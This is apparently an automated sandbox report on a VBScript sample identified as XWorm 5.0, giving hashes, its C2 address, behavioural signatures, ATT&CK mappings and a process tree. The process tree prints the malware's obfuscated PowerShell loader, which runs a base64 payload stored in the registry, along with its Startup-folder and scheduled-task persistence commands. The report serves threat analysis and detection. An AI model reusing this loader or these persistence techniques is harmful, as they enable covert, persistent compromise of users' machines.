Analysis
max time kernel: 91s
max time network: 202s
platform: windows11-21h2_x64
resource: win11-20240611-en
resource tags: arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 21-06-2024 20:40
Static task: static1
Behavioral task: behavioral1
Sample: FUD.vbs
Resource: win11-20240611-en
General
Target: FUD.vbs
Size: 51KB
MD5: 26bc3ae0510eb0a95be6a04e7bcbfcfd
SHA1: 02a8d91671167e9eb394e3be68c909c4b30212e8
SHA256: 825d0918656842496be2186889202fd231c7f823f2a8f788e7a8a2f3b91e1c28
SHA512: be82ba27267d5486b2181a18cba0397587d5f3d3de573d9b2e3e0ba8e5479dbb15dfb3c708005c6c3882b592de24a8188e40942d8d8ccfe33f5377f9521e4f08
SSDEEP: 1536:x6wVdHzZQwZ9SkelLyAPh0voJKfI2jygScsddWZrv+V+:x6w7zJ9reVUvWII2gJdWZT+V+
Malware Config
Extracted
Family: xworm
Version: 5.0
C2: modern-educators.gl.at.ply.gg:23695
5TVJCEjsbmht8pkD
Install_directory: %Userprofile%
install_file: USB.exe
Signatures

Detect Xworm Payload (1 IoC)
Processes:
  resource                                                                      yara_rule
  behavioral1/memory/3756-15-0x00000188212E0000-0x00000188212F0000-memory.dmp   family_xworm

Blocklisted process makes network request (3 IoCs)
Processes:
  flow  pid   process
  2     3756  powershell.exe
  4     3756  powershell.exe
  5     3756  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Run Powershell and hide display window.

Drops startup file (4 IoCs)
Processes:
  description                   ioc                                                                                               process
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs      powershell.exe
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk  powershell.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk  powershell.exe
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs      powershell.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
  description      ioc                                                                                                                                                                process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows backup = "C:\\Users\\Admin\\Windows backup"  powershell.exe

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  1     ip-api.com

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Delays execution with timeout.exe (1 IoC)
Processes:
  pid  process
  244  timeout.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid   process
  3756  powershell.exe
  3756  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  3756  powershell.exe
  Token: SeDebugPrivilege  3756  powershell.exe

Suspicious use of WriteProcessMemory (10 IoCs)
Processes:
  description                       pid   process         target process
  PID 4708 wrote to memory of 3756  4708  WScript.exe     powershell.exe
  PID 4708 wrote to memory of 3756  4708  WScript.exe     powershell.exe
  PID 3756 wrote to memory of 4172  3756  powershell.exe  schtasks.exe
  PID 3756 wrote to memory of 4172  3756  powershell.exe  schtasks.exe
  PID 3756 wrote to memory of 4736  3756  powershell.exe  schtasks.exe
  PID 3756 wrote to memory of 4736  3756  powershell.exe  schtasks.exe
  PID 3756 wrote to memory of 1648  3756  powershell.exe  cmd.exe
  PID 3756 wrote to memory of 1648  3756  powershell.exe  cmd.exe
  PID 1648 wrote to memory of 244   1648  cmd.exe         timeout.exe
  PID 1648 wrote to memory of 244   1648  cmd.exe         timeout.exe

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"
  PID: 4708
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs'; $impounding = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $impounding = -join $impounding[-1..-$impounding.Length];[<##>AppDomain<##>]::<##>('nonconstructivenessurrentDomain'.replace('nonconstructiveness','C'))<##>.<##>('handhiddenoad'.replace('handhidden','L'))([Convert]::FromBase64String($impounding))<##>.<##>('dynamistsntryPoint'.replace('dynamists','E'))<##>.<##>('Inpandiedoke'.replace('pandied','v'))($Null,$Null)<##>;
    PID: 3756
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows backup" /tr "C:\Users\Admin\Windows backup"
      PID: 4172
      - Scheduled Task/Job: Scheduled Task

    C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /delete /f /tn "Windows backup"
      PID: 4736

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp55EB.tmp.bat""
      PID: 1648
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\timeout.exe
        Command line: timeout 3
        PID: 244
        - Delays execution with timeout.exe
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Downloads

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 171B
MD5: 7042c11eb8fc9c15c066d2a6ae961964
SHA1: a40c23cbf8ab7b28c7d1a11a4614ae906220468a
SHA256: aa183b22bfd130bcdd19b054ab7c707efd2c05086c64c76cfcb00cc760880535
SHA512: fceca003d2095e4a20299e1bc89dd67ca46322119c384384112e94a6693dfae8ce9ad6e6b9923bb7d6329bab3642589688964021b5b15238caf33dfb22d4fcf5

Filesize: 126KB
MD5: 7986b3b517f489617d79108122fcd8cf
SHA1: 84f552ae09664b01d7373e991b1a13de4e87b9a9
SHA256: 8db9f6122ec98cb9b193f686b1c14beabd5d704dae837aa9b681f81ecb65acf5
SHA512: cbc0b992724221bc0c9afd2c8632d8624a3804ab6517d48f5f215d2611ee3dc06d620db114546b11102506887daa0cc5b222438e63833fb1e5fecd3e837e4254

Filesize: 233KB
MD5: 94a8a32cf8dfddf84632d0a3c33cefe5
SHA1: bbede4cf5f5691dc13be3a227cf5dacf69620c95
SHA256: b9d852b551bce67e2a5c0b35ac415c81e541b5ac38034fdc29ab8675b1d7c09c
SHA512: b0694d60e86e647e91244f560fee19c83bf3357ac40608e1bd7e20781eb02bc256a873ed0257acc2aff26fe1f5a8161526f8bfcd4354cd1d32b4690b62d8d732

Filesize: 200KB
MD5: cc353cf6bed7da0eac3e767eaf403666
SHA1: 4b451a58656fe9038d815a3da8099bc90d6cd80d
SHA256: cee873ccd4bc25d5d3650076866d946bd65369ba551259514f229a0f77c770c9
SHA512: 0595e02a4c84622eec931199cc30016d66b9de741bc3ace82e6b2d501ec1aaeb70f6903be857d68bca5c649d493e80e4fe68aea63a8095c4eae3bd30d2d6de2d

Filesize: 217KB
MD5: dbbc8bad95d94a4815747f867a735ca1
SHA1: 0fa74d91c3aedc1ea05592a9f88a53040bb6d4b1
SHA256: 70fb38cd728c7f53bbabcf5d513ca46a8c8ec69e39e919ff012de3fcfd6a3602
SHA512: b66f5e0436c96f834995da554749d018813511ef7ecfa63bae21cd122ad128c0613df6b862c394caea4f9013fc49577a0e32ac98ac695aa4c673d51ee42e6989

Filesize: 110KB
MD5: fd1e66e0b4ee59c00a3faee2c3909220
SHA1: d1a2e3ccc183e948f3f3cecd9f7d678ee83359b8
SHA256: d20ca151c4250e1b7098a396133745bc7d14e5ab58ceebdde505e211d4550c68
SHA512: bf369cef7b6f550d168529e7befff98530353ac67d6deb21f0f65b419267bc6380b50f060eaa332f9f4f96c4c658e61395c4d52342d6e08a8b145da5023ac420

Filesize: 167KB
MD5: e8b13804c289df44e8434f76b05e9c15
SHA1: 5db6b63657391a93e0413be87681922aec3932ce
SHA256: 43552fe4655dfa5826292625dc20ebd8903a5943e60e10fad5f2d9ca43cf7208
SHA512: 80c9028b4d8d3f720be48e9f1e43f4955052bc93ccc689bc8229d8f20e15955776961ad98f8e9be05861a4175fc6b4ea82301f03456a7aaeeceb16333fbfb856

Filesize: 274KB
MD5: 0542f85297fe66c231d4eec49bd8313a
SHA1: 10ceb5155363beaf47449b980f8a16efabaeca20
SHA256: 1184982bddc6bed09acd573f05343309084b16f248f203e3156739e3c5fb8dfe
SHA512: 32ed3c5ee4be97a98fbf803c927c45abf940580b6fd434eca8546f45e01b9d363073aad51c2b3c68573f2b1734e2a370cf87038358ed0fc912d607b265db004b

Filesize: 118KB
MD5: ef4d554bfd99d8da1ae8eb52f88e485e
SHA1: a940f9c9ca9c3f9c466e5e250c4681900b6af287
SHA256: 8f4eb7fe0d8991bf95ee95e79b9b8af0ffeef9607ed1cd30372f24fc1238eb30
SHA512: 97318d4bcf043b4c64b6dbc695e1edb0a8f976cff179387d4d7353d2aec2fdcf572606d1e56ec26e254b9aecfb3e05bb1fdd2d60847b14a06633a60cc6526b56

Filesize: 208KB
MD5: 6c3e664da2573086709d18b3d777786e
SHA1: 5b93a74805353a27e2570f125f4ed2ac8ce6781c
SHA256: 455640aced94e6bc1e54c008d34a132c2e918dfff7685e81b39d298e8d5555e1
SHA512: 4b70b2e62dec3ba0f8745d4d9c8f5e21d366217a67243571967a8fbbad8198b1832270549819530fd7834f777c55c4b69ae15899f70122b13ab64f2a20977da4

Filesize: 2KB
MD5: 8bd6778743049548d88fd68cead40673
SHA1: 055c8880b05a6944d61960d0ef9ae2ab8d2d6d13
SHA256: 1b9dd459eee3286e207f80698e90ac599b61e2613141b391c318a10caf54fa72
SHA512: a42b4a948de6c8552a9954e88c84eb08ae212653bf920e3a905bcb652ecf76ad81b55e23443b053cbadd62b44274372b39171c3a2a0f1e5634bee2a0708c8db4

Filesize: 258KB
MD5: 338c2df1c8f6fcc751831566d950252a
SHA1: 062324cc77147ccb00810c7cad98bc3424b39fdb
SHA256: e75bea9ed43b12e5ae88d8b154d94145e60244ef1ae40fe6ed2f4f34e8227df2
SHA512: dd6c27891acdd1324d659692d28a75780141e4c08bd8e845eadbe48d20740be67d42bcffbadb09cf52f1e3706c13f3d970e30c60c100a15ad46720de4422df99

Filesize: 282KB
MD5: 6bd9b40e6c55f845e0c93c0996d50767
SHA1: 1426b8994e7943f9705a6544179bf1be617d43d3
SHA256: 057a7d47a4a33b9b5a035a8c78319cc2d83a97e011c6d4e6c20813bdfddfc7a3
SHA512: 6dd44dc0e178f4ef743884072e19b026a3d9c7fb633453295cefaf9a64d683d872edc7fe09a6a2078fdd446d0b448157e020a9a47906b1be1daf86657ac26eec

Filesize: 176KB
MD5: c32c641439e79a72c3136f286f8e5237
SHA1: 317f0e592b5d7a108740540de16e4f780c1c445a
SHA256: a002f64564a71b51de263d2d6af5d94744d622bd6286c48056666c700dc5175e
SHA512: 07232dd5dfac74dffe13ffb599d1b5516d284da4bd18cf059024ffd1023b9e8793ebab1b1fc1a1dfc0c699725f2dd5a8e311610946ca895eb1b3de068958f944

Filesize: 159KB
MD5: e87cff96a2978aecda7de6575ab7526f
SHA1: 183494e887ec59366f4e9b31dec50f74c1854b9d
SHA256: 45a7ff7d9b2cb3d0a67591a23f8307003e57187d6dd9a30906af645802990e26
SHA512: 671c8f1b41d5d2e91e49a9fbde1e4a92b4ce104a7ea301a5ac5c37dcfb434b97e9df080616cc8f49dbad769802586b5b3b75920d38ccdd3f0af52e53ec9a3cee

Filesize: 401KB
MD5: 0bba5dc28e5a60f457a07f78b5d3e43d
SHA1: 8f3e60b559288f3b77a7c4e95b88db5a36a2dd77
SHA256: 02ad4361ff95ee2f909551d9a6a296986c726ac2cefd9197f12c1ac72928e655
SHA512: 6f69fac496cfe876b41367d366a85615d581586b7e99df9a941c129b5b85cfc3ef7f7880a07a922415ca0ff089e58b59e617c874594e06b9f582a8287675f31a

Filesize: 249KB
MD5: e20053933becd770dcab6630cdb74748
SHA1: 1df3571a0f00605e1e41138278f1d63618d0ddac
SHA256: 083b13b7d04ed76220aa1fb1cd77a3572a509f52b738a90d40ffc607f3f7caea
SHA512: b41c6a80ca606c7ed3659ff16ee74c3a4d9a1d30d084c578f4cc333c7b00bbd61fcd2976aafd44b76a6dec7d420309e774fa01344537bc18178d53ec27500623

Filesize: 192KB
MD5: 14ad2250e861ea5bfd01f789972188ee
SHA1: 3f8fb9415f9bb4946c777a5af1457073711411c0
SHA256: d5bb46894d0c200773ab8ec232a0ade11e0b43f1bdfe51cfcece93c60fd8b585
SHA512: 0f9e13278dad276b21c29ef7de8624d1d27951fa5f5e533eaa6e267c391b799961b72774c9193ec45a31081bd50805bfc9d5abd8713960819b8a6e654f9cf22a

Filesize: 135KB
MD5: d321c265ba7a2b313d2d6bc30c1e0a37
SHA1: 5c2a1d17feb7259d457f6d8fa5058db5afec9c94
SHA256: 79f81c327985134d74e978430537bd7eb8d7f9b65c775a0b4dc1ea433d41cf7f
SHA512: b9c1efbaff2677169a2fc325c5ef5f0a4f92461c99d313726149958e6123a849e3be3e0e61a9dde4c92a701111353c84b036858bf2f4f2b3f7bc980a44caba52

Filesize: 225KB
MD5: af6d1580060269b90686aabe1833f61e
SHA1: e1a8da0f2723e7eaa51d5b3c575f674fe745de05
SHA256: e16b73836a15d028600ae095b74f20438b514453788e46f9866ccbd2e34c5a6c
SHA512: f73f3c452ba7c1696e9e3704b83449ab2fdfacdccd7dc90fd5d656614e69e0c0272e3a8f8f624b5139da60f4130a587de0d213451271fabaecf7fe91aaac601d

Filesize: 241KB
MD5: ac78f601094e989bcd642b1badeb7e83
SHA1: 85c4c32d0e496c975fc92275746c3c9de24c43b5
SHA256: d3c920184d9491cb7ae8b57000be92a3508345df70d471a67698a29b55d5c400
SHA512: 9ed4f93a34fdebaac9ccf2285f1c8b77bf238b5c451fb1ffefb00e8c6d7024b0abe99d6f2e9c28de9d2f3a5cd12cec308dddb6eadfd116499f00b8d169cb99a1

Filesize: 143KB
MD5: 3936334591fabba1ab7c66613cae789a
SHA1: fb7327e15408e4b2d13598ef68f91765a409e560
SHA256: 8532511d4abfa14d335e672144566f63d1d18b527bc2f54b957fea79d95d29d2
SHA512: 30fae0d788258b0bc729d3fb12e99de4f90bf2faec9d61399b87ee82d2bbb0eb341c4b57fc014606fd9a756bfffa101976779b832f80be93d898f560e0c2eceb

Filesize: 102KB
MD5: 7b6f067931ad6057c806bacb5068fdc7
SHA1: bd98c7e26f0302b1bd5b935f684a39b9239ff4c0
SHA256: 6de88ea9fe9eb233c4be7b77280374065d2ec18e40bd55645ce15c5b3e4cf9dd
SHA512: 209aa77605fa8e4aabd229473da671f13e1ab814e6bad3a4191eb300fa0d7a122f1f701cb7c8e7ac452d424b1c4bf59a4d82b32f0db3ee273c2fd29547fe34b9

Filesize: 151KB
MD5: fc2a7db6ced77008f49ea76806253610
SHA1: 73049c82c2a8760bf4aa298b7c9ac8289764d2cb
SHA256: 67bf4980fa5e358ecca3b8fa39a066c338efd9182cedcf6db9231f288c415b7c
SHA512: d86b4ed7beedd9c0a8fae80dfd799f319652bbc284591c89d181e294cd72b01acaf715bdeac3d6cec6d2d4fb96b2c3ed19a5d536615e0e381015eeca6788f83c

Filesize: 184KB
MD5: e711276eec6f475322a7632e9b291938
SHA1: 3e47b6207c8d8b62a2f6ca27bc51377c02b545be
SHA256: 407492babb42b73c36fed75f5092f33f8948f2ca4111ecdfed87d412f3b3edbf
SHA512: 6e2ff1c158d6c000bbe0a83f9c2cd8deb7d4f8357a70ca8d281aa39993c822f0d81be6382c5a7757cd1daf261d486f50d91a75708d67858872d9912f79db7594

Filesize: 290KB
MD5: aa87869e275995b1e6387212d049b9b7
SHA1: 12fe2f5bb81cab5c76970bb5901d8b1e4fadc51f
SHA256: 3fd0912caebe501ae112787a2621fd31ce67c2b0e9b8d07af357db6668d50350
SHA512: 05783195dcc067fd4c3e316f56d1a27af8aa364f1f89b89638e91c114521877c008bd552856fc92c02deacb3d95cc98316f7ebac76da5eacd086d41bc1f871b0

Filesize: 266KB
MD5: b5799340ca2c56b3f188bdfaf3e95cc8
SHA1: cf3bece36d59c0ae21be2798eadf57114ea2c946
SHA256: b6d9b58735f9447ceab09849fbdacb8c65d536ed36d57dd1dbba498f56c6cbf5
SHA512: d60400cf8200b864852ffa17c112a036034266d8c58cc870f51a29310f09006b4d17471eea1f5c05dd9e1a99b5a82e119158a460d88619a50268b79b0674f21b

Filesize: 2KB
MD5: 3332937217e7fc3a5994f76f77e4a494
SHA1: 2c41a6c81255c2854ce06fe91595c82d1286960d
SHA256: 17773d25ce1e097da6df927e39f80645cec3285f6a1b7ab29bb818e67bf4cc63
SHA512: c42aaa6db3f76a671d3aab8fc4acaa3a6b7825d1a54795639708530fc4ba361c54e004cc1119b72786cdec59eeadcef76752887ba476db84ca66f44993205573

Filesize: 1000B
MD5: 2c07f1e472e3cba6aa935cfafca03051
SHA1: 9691fb753c4fb7f1ea26781b08f26cab6e4ba22c
SHA256: 32d675963d02343c0854fef3b004b57413e11571e0b8f8c94e468550d73df7e9
SHA512: 2261be317c330e91fa76a2f7ba9836ed411014ea1ddc22eb9062c044bf21fd858f7211bf199f7ac7474306af9700ee8956c11c6d6d65b89cc2d5e63412ac05dd

Filesize: 2KB
MD5: d1435ac505580e87f8a3b30d2fe93a99
SHA1: e0f85c87d90a326bdaa3f7e5bad4fa090599698f
SHA256: a6e73a4bc4305745a8211123e806a39dc4f3149c19bc1a89d62e6ae2b6f824bd
SHA512: 35b4838de98e194ab9285d9d6f19090aab7d397a677648fb4011735c66cd776f1679ff47658b1ad924dc5c1481903facd3dafb7d351d3c698318a452dc1c1880

Filesize: 923B
MD5: 0c7a77608acbf8767fe0441b8d33e842
SHA1: 4676d9815f8c50bd9b92fe22ace1031e537e27a9
SHA256: 4a9d8837aa082ff9716ec74f9c4b9d164ea1f4246b324b6e8e17f9de61e1fa46
SHA512: 8ce663cd75bd65fdbcd51d4b71484d926ed80f5950b9379156c0fdaee10c4fd3bf575803bc1b2f146f0e5619bba9bf9477d3c8919c2ff0b67f54c075dc592d7d